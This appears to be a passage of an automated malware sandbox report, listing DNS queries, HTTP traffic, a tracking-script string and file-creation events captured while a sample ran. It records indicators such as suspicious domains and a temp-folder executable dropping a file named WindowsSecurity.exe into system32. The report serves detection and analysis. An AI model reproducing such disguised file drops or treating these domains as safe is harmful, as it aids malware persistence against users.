Source: chromecache_423.4.dr	String found in binary or memory: {"2935210":{r:[[{o:"c",t:"ru",v:"https://www.facebook.com/ekonomista.pt"}],[{o:"c",t:"ru",v:"https://www.instagram.com/ekonomista.pt/"}]],b:0}}],gp:'irgwc',gc:'irclickid',csc:{domReady:1,tag:'img'},ccc:{domReady:1,tag:'iframe'},cec:{domReady:1,tag:'img'}},{id:'16068',td:'disneyplus.sjv.io',ad:'1330391',iw:null,ti:['30351'],d:'(?:^([\\w-.]+\\.)?disneyplus\\.com\|^([\\w-.]+\\.)?disneyplus\\.demo\\.cdops\\.net\|^([\\w-.]+\\.)?qa\\-web\\.disneyplus\\.com\|^([\\w-.]+\\.)?subscriptioncard\\.disneyplus\\.com)',gp:'irgwc',gc:'irclickid',csc:{domReady:1,tag:'img'},ccc:{domReady:1,tag:'iframe'},cec:{domReady:1,tag:'img'}}]},{ver:'U184',ze:'IR_',zg:'IR_PI'},u,o);window.ire!==a&&(window.ire&&t.H(window.ire.a)&&(c=window.ire.a,setTimeout(function(){for(var n=0,t=c.length;n<t;++n)a.apply(a,c[n]);c.length=0},0)),window.ire=a),window.irEvent=function(n,t){for(var r in u)u.hasOwnProperty(r)&&t.push(r);for(var e=0,i=t.length;e<i;++e)!function(t){n[t]=function(){var n=[].slice.call(arguments);n.unshift(t),a.apply(a,n)}}(t[e]);return n}({},["enforceDomNode","on","off","setNewSessionCallback","setPageViewCallback"]),(function(){})()}(); equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.brickfinder.net
Source: global traffic	DNS traffic detected: DNS query: s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: analytiwave.com
Source: global traffic	DNS traffic detected: DNS query: ananalyticsnodes.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: security.cleodgiflaoer.com
Source: global traffic	DNS traffic detected: DNS query: emeoxm.com
Source: global traffic	DNS traffic detected: DNS query: www.hulu.com
Source: global traffic	DNS traffic detected: DNS query: cnbl-cdn.bamgrid.com
Source: global traffic	DNS traffic detected: DNS query: assetshuluimcom-a.akamaihd.net
Source: global traffic	DNS traffic detected: DNS query: disney.my.sentry.io
Source: global traffic	DNS traffic detected: DNS query: metcon.hulu.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic	DNS traffic detected: DNS query: ds-aksb-a.akamaihd.net
Source: global traffic	DNS traffic detected: DNS query: tags.tiqcdn.com
Source: global traffic	DNS traffic detected: DNS query: vortex.hulu.com
Source: global traffic	DNS traffic detected: DNS query: geolocation.onetrust.com
Source: global traffic	DNS traffic detected: DNS query: collect.tealiumiq.com
Source: global traffic	DNS traffic detected: DNS query: connect.facebook.net
Source: global traffic	DNS traffic detected: DNS query: collector-1564.tvsquared.com
Source: global traffic	DNS traffic detected: DNS query: sc-static.net
Source: global traffic	DNS traffic detected: DNS query: s.yimg.com
Source: global traffic	DNS traffic detected: DNS query: js.adsrvr.org
Source: global traffic	DNS traffic detected: DNS query: d.impactradius-event.com
Source: global traffic	DNS traffic detected: DNS query: intljs.rmtag.com
Source: global traffic	DNS traffic detected: DNS query: analytics.tiktok.com
Source: global traffic	DNS traffic detected: DNS query: uconnect.tealiumiq.com
Source: global traffic	DNS traffic detected: DNS query: tr.snapchat.com
Source: global traffic	DNS traffic detected: DNS query: ad.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: 3797690.fls.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: td.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: b.videoamp.com
Source: global traffic	DNS traffic detected: DNS query: adservice.google.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: insight.adsrvr.org
Source: global traffic	DNS traffic detected: DNS query: sanalytics.disneyplus.com
Source: global traffic	DNS traffic detected: DNS query: sp.analytics.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: datacloud.tealiumiq.com
Source: global traffic	DNS traffic detected: DNS query: ut.rd.linksynergy.com
Source: global traffic	DNS traffic detected: DNS query: analytics-ipv6.tiktokw.us
Source: global traffic	DNS traffic detected: DNS query: idsync.rlcdn.com
Source: global traffic	DNS traffic detected: DNS query: tags.rd.linksynergy.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons4.gvt2.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Sun, 15 Jun 2025 22:11:18 GMTcontent-type: application/json; charset=utf-8content-length: 23server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=k%2BPta4ZP%2BsoC4sxH55TJ58TGhxUEd3imUTzroK%2F7fgsMHEwXv40ZIXjOgI%2F2TZ2FNesyJfBwpUQEj03cWyPtsRTz2GqFVI7Znmnn%2Bz2cbA%3D%3D"}]}cf-ray: 950567060dda8cab-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Sun, 15 Jun 2025 22:11:18 GMTcontent-type: application/json; charset=utf-8content-length: 23server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=gbDr5m1p4xgL8m7rQO6B6bx0R7J8ZkOdHOiB0LUQJHnRbulAFO220fjA6MDUuiVJZJJ%2BJSqPbF%2FmMT5umPM0PXVMXrt270s71pGYkDjafQ%3D%3D"}]}cf-ray: 95056708af308cab-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Sun, 15 Jun 2025 22:11:20 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=14400last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZMqMhf0Z0RLNwWIu85%2FMd%2F0UGRpGLpx0m7%2FSu%2BCsNxPikmkNoaTC4NM3KbIRDOtzXhP%2BOAljvt%2FKyhWhIQmPWAgp%2F0ni6gmdkkv0xuVJ%2B%2B%2FY8YToluPIvr8l"}]}cf-cache-status: EXPIREDvary: accept-encodingcf-ray: 950567129e5d43bf-EWRalt-svc: h3=":443"; ma=86400content-length: 1967
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Sun, 15 Jun 2025 22:11:28 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=3RpZOkfRPCounEFMkgwK3BaXatWM7lZ%2Bh9c%2FcLXCdhjQ4B1bTeth%2FKokEAoAm%2BLP%2BS2Zk5khNGjOKQyT5%2BV7pwfA5o6fVsErae5sNxzOiQbMIlF5Q79wTBit"}]}cf-cache-status: DYNAMICvary: accept-encodingcontent-encoding: zstdcf-ray: 95056748aa8643bf-EWRalt-svc: h3=":443"; ma=86400content-length: 818
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Sun, 15 Jun 2025 22:11:31 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=NQnfIxFUeIW5IpBajTuIiYscSWk%2FiDu68a6U6sy%2BisPR85r0nn4HaH4C7alWznFL7yw8D4K%2FVLQ4JlriATOyQdVeZt6x5wNIvJ%2FCk0Bx2d0tvlD7Ybz8HouY"}]}cf-cache-status: DYNAMICvary: accept-encodingcf-ray: 950567551d60b9c6-EWRalt-svc: h3=":443"; ma=86400content-length: 1967
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Sun, 15 Jun 2025 22:11:32 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=cP1an8IfLkM7TtWczsqw26N29uGhkH%2BP80X5V9YJnl9w3d32k%2FtO7K48nJhN5hY609tPSW%2BnZZXwDD0J1ez3ZwBckVfLiskHIisFSnZbo5B%2Fb%2F3Sl6t92Gij"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}cf-ray: 950567626d2143bf-EWRalt-svc: h3=":443"; ma=86400content-length: 13
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=utf-8server: envoyx-datadog-trace-id: 4642284409033989568x-datadog-parent-id: 954552401120867191x-datadog-sampled: 1x-datadog-sampling-priority: 0etag: W/"6d73-KKUQM/RV1NrFupTZyPdmoJQh9FM"content-security-policy: upgrade-insecure-requests; frame-ancestors 'self' http://.hulu.com https://.hulu.com;strict-transport-security: max-age=31536000x-frame-options: DENYcache-control: max-age=1800x-envoy-upstream-service-time: 42x-diproton-route: Envoyvary: Accept-Encodingdate: Sun, 15 Jun 2025 22:11:44 GMTcontent-length: 28019vary: Originset-cookie: bm_sv=B1992683B198A83A3C53F502E1B85EA0~YAAQHFLbF+2f1zmXAQAAmQimdRxJ++X9oO/rfVe9bcREqgcVjWeWAxA64eMM4xcOhYTsFrcZ57KbM7TTg1qDFBNTIXSnJU7ZLobJaf7DKkm6SmMEr2VJCLpLzBS/hfmy9X2uVgyLRe4cOD6l3kXgI7ejy0RHNQkwBRCfE59SHDriOYVnJuU+qlv7T2aBH09dgKNt6ILYg2DgMUVHPm+E8+W7C9vJqbtdr6FoMlLo3H6XmSkkE0Dp0zvLS/JNVg==~1; Domain=.hulu.com; Path=/; Expires=Mon, 16 Jun 2025 00:11:34 GMT; Max-Age=7190; Secure

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6211.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE18.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File created: C:\Windows\system32\WindowsSecurity.exe	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?d7c37ffccf06ac54eaa3c1d6d57e47b2 HTTP/1.1host: a-ring-fallback.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?7ac0714abc1f6b7d918b269f9600dcbb HTTP/1.1host: a-ring-fallback.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=69e825d1a5fbc473e81a58ea32b73619&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22fp-afd-nocache-ccp.azureedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1},{%22RequestID%22:%22teams-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1},{%22RequestID%22:%22a-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:28893,%22T%22:1},{%22RequestID%22:%22a-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:0,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lXFhGSe5EE64GYp&MD=C7Tfwzay HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/css/justifiedGallery.min.css?ver=v3.6 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/google-drive-embedder/css/gdm-blocks.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/style.css HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/etsy-shop/etsy-shop.css?ver=2.3.2 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/lightboxes/swipebox/css/swipebox.min.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/flickr-justified-gallery/css/flickrJustifiedGalleryWPPlugin.css?ver=v3.6 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/tablepress/css/default.min.css?ver=1.11 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/3d-flipbook-dflip-lite/assets/css/themify-icons.min.css?ver=1.7.25 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/3d-flipbook-dflip-lite/assets/css/dflip.min.css?ver=1.7.25 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/twenty20/assets/css/twenty20.css?ver=1.5.7 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/js/ie10-viewport-bug-workaround.js?ver=1 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/js/bootstrap.min.js?ver=1 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/style.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/wp-to-twitter/css/twitter-feed.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/cookie-notice/css/front.min.css?ver=5.4.16 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.0.1 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/wp-hide-post/public/js/wp-hide-post-public.js?ver=2.0.10 HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/css/bootstrap.css HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.brickfinder.net/wp-content/themes/bfinder/style.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/bfinder/css/style.css HTTP/1.1host: www.brickfinder.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.brickfinder.net/wp-content/themes/bfinder/style.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
